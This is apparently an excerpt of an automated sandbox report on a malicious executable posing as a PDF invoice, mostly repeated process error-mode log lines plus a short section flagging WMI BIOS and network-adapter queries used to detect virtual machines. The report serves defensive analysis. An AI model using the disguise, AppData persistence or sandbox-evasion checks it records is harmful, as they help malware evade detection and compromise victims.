                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
